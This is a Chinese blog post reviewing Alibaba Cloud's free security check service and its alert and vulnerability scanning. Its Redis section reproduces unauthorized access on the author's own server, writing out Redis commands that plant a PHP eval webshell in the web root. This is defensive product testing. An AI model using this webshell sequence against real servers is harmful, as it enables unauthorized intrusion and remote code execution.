安全体检新体验

安全是在数字化加速的今天，企业生存和发展的必选项。安全体检是阿里云面向云上用户，针对授权环境提供的一种免费安全检测服务。只要你是阿里云的用户就能免费获得安全攻击告警、风险配置检测、高危漏洞检测等多项免费安全能力。百闻不如一见，百见不如一试。今天我就带大家一起体验安全体检并斗胆给官方提一些改进建议。

安全体检从哪进？

安全体检是在安全管控产品之中提供的服务，而安全管控你在控制台其实是无法搜索到的。

/img/aqtj/anquantj.png

因为安全管控是云盾的子功能（根据 URL 和标签页标题猜测的）。

/img/aqtj/anquantj.png

但是你进入云盾（现在改名叫云安全中心），其实是无法找到安全管控这个产品的控制台。

安全管控藏的很深，这倒是蛮像它的定位的，因为它很大程度上代表了一种底线，就像开网店需要遵守工商规定一样，使用阿里云服务需要遵守国家法律法规（参阅https://help.aliyun.com/document_detail/469816.html）。如果用户发布违法内容或进行违规操作（比如传播恶意软件，使用 ECS 挖矿，AK 泄露到公网等），阿里云有权采取限制措施（暂停资源接入等），就像平台发现违规店铺会下架商品甚至关店一样。安全管控主要提供了查看和解封功能，这也是你以往关注不到它的原因之一，正常使用确实很少跟它打交道。

而现在，在合法的底线之上，阿里云还提供了免费安全体检功能：相当于给你的云服务器安排了一位24小时在线的安全医生：它能够实时监测网络攻击（比如黑客入侵尝试）；自动检查配置漏洞（就像检查门窗有没有锁好，类似基线核查）；扫描系统漏洞；发现问题会立即告警。

但是，安全管控又不难找，你可以直接在控制台右上角悬浮窗找到安全管控，他与实名认证、访问控制和AK设置在一起，你可能没有用过这个功能。

/img/aqtj/anquantj.png

另外，如图在控制台搜索框键入【安全管控】也可以进入安全管控控制台。

/img/aqtj/anquantj.png

详细分析

安全管控中的安全体检功能提供免费的基础安全检测，产品的安全检测结果会汇总到云安全中心，云安全中心的部分（尤其是高危）的风险问题会汇总到安全体检。

【云安全中心】检查内容：

/img/aqtj/anquantj.png

【安全体检】的内容：

/img/aqtj/anquantj.png

【安全体检】与【云安全中心】相比更加简明实用，能够帮助企业和开发者解决迫切的安全问题。

攻击告警范围

云安全中心告警和 AK泄漏告警的内容是来自云安全中心——云工作负载保护平台（CWPP），具体内容参阅：https://help.aliyun.com/zh/security-center/user-guide/overview-6

同时，云安全中心支持安全告警实时检测与处理、漏洞检测与一键修复、攻击分析、云安全态势管理等功能，已安装云安全中心Agent的服务器重新启动后，云安全中心的防御进程需要一定时间才能生效。

**需要注意的是，你能够接受到何种类别的告警取决于你购买的云安全中心版本。**例如：

免费版云安全中心提供的安全告警类型包括：

漏洞扫描：检测Linux软件漏洞、Windows系统漏洞和Web-CMS漏洞。应急漏洞扫描：预警近期高危漏洞，需手动执行扫描。异常登录检测：识别非常用地登录和暴力破解尝试。 AK泄露检测：监测GitHub等平台上的AK信息泄露。合规检查：支持等保合规和ISO 27001合规检测。

病毒查杀、容器主动防御、进程异常行为、敏感文件篡改、恶意软件、异常网络连接、防勒索等需要付费升级，推荐购买防病毒版以获得基础的服务。

https://help.aliyun.com/zh/security-center/product-overview/functions-and-features

/img/aqtj/anquantj.png

免费版告警并不会对系统进程进行分析告警（挖矿进程除外，如检测到涉嫌违法的挖矿进程，系统将直接触发安全管控）

如果你想要对操作系统及其上的应用进行优化，那么操作系统控制台提供更可视的诊断功能，该服务目前限免。

/img/aqtj/anquantj.png

验证功能

攻击告警

/img/aqtj/anquantj.png

由于我的 ECS 安全组配置合理，几乎没有服务和端口暴露在公网上，因此攻击告警部分为 0 这一部分并不奇怪。

我们企业常见的攻击其实是渗透测试，如果进行云上资产渗透测试需要在安全管控页面申请渗透测试许可，放行我们渗透人员的IP。渗透测试许可并不需要等待很长时间去审核，基本上是申请即通过。

/img/aqtj/anquantj.png

云服务器漏洞

/img/aqtj/anquantj.png

云安全中心-主机资产-漏洞检测功能应该与安全检查中的云服务器漏洞模块是一致的，需要注意的是，我们是需要手动点击【立即检测】才能触发检查。

/img/aqtj/anquantj.png

应急漏洞验证

/img/aqtj/anquantj.png

应急漏洞就是云安全中心首页这里滚动轮播的高风险漏洞，他们会对服务器造成巨大的危害，该功能在免费版也提供了支持。

在这里我们以 Redis 未授权访问为例，看一下安全检查是否能够检测出来。

易受影响的版本及原因：

Redis 3.2.0 之前版本：
- 原因：默认未启用 protected-mode（该特性在 3.2.0 引入），且默认绑定地址为 127.0.0.1。
- 风险场景：若用户手动修改配置将 bind 设置为 0.0.0.0（开放所有网络接口）或注释绑定规则，同时未设置密码（requirepass），则服务会直接暴露在公网，导致未授权访问。
所有版本（包括最新版）：
- 无论版本如何，若未设置密码、关闭 protected-mode 或配置防火墙允许公网访问，均可能遭受未授权访问。

该漏洞在 Shodan 等网络空间测绘平台中可见大量暴露实例，根据 CVE-2022-0543 等历史漏洞记录，未授权访问常被僵尸网络利用进行挖矿攻击。最严重的情况，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器。

漏洞复现

我们在 ECS 上安装 Redis 3.0 版本并修改 conf 文件将 bind 设置为 0.0.0.0（开放所有网络接口）。

步骤 1： ECS 上拉取Redis 3.0镜像
- docker pull redis:3.0
步骤 2： ECS 上创建自定义配置文件（覆盖默认bind）
- bind 0.0.0.0 #其他配置按需添加

步骤 3： ECS 上运行Redis容器

1
2
3
4
5
6


docker run -d \
  --name redis3.0 \
  -p 6379:6379 \
  -v $(pwd)/redis.conf:/usr/local/etc/redis/redis.conf \
  redis:3.0 \
  redis-server /usr/local/etc/redis/redis.conf

/img/aqtj/anquantj.png

步骤 4：攻击机上写入webshell
- 利用条件:目标开启了web服务器,并且知道web路径(可以利用phpinfo或者错误暴路径等)，还需要具有读写增删改查权限
- 根据我在 ECS 上部署的 PHP 网站在攻击机上构造以下命令并执行：
1 2 3 4

config set dir /var/www/html config set dbfilename hello.php set webshell"<?php phpinfo();?>" save
- 返回 ECS 查看结果
- 在 ECS 上创建 webshell 的一句话 PHP 文件
- 执行如下命令
1 2 3 4

config set dir /var/www/html set xxx"\nlnin<?php eval($ POST['x']);?>\n\n\n config set dbfilename webshell.php save
- 返回 ECS 查看结果

漏洞修复

Redis 未授权访问这个漏洞在阿里云内并不是唯一的，在应用漏洞里面它的编号是 AVD-2021-905492，在应急漏洞里面它的编号是 AVD-02021-0344。

/img/aqtj/anquantj.png

我不知道阿里云在扫描漏洞时是如何区分这两个漏洞的，但是这个 Redis 未授权访问漏洞在应急漏洞里面没有展示导致了在安全体检的漏洞页面也找不到这个漏洞，即使这是一个高风险的漏洞。

/img/aqtj/anquantj.png

Linux 软件漏洞验证

由于我的业务服务器均升级到了最新版本，因此公开的漏洞是不可能扫描到了。在本章节的测评，我将尝试新开一台服务器，使用低版本 CentOS 。来验证 Linux 软件漏洞功能。

已停止支持（EOL）的 CentOS 版本

版本	停止支持时间	状态说明
CentOS 5	2017年3月31日	官方支持完全终止，无安全更新，镜像源已移除。
CentOS 6	2020年11月30日	进入EOL阶段，不再提供维护更新。
CentOS 8	2021年12月31日	原计划支持至2029年，但被Red Hat提前终止，转为滚动更新的 CentOS Stream。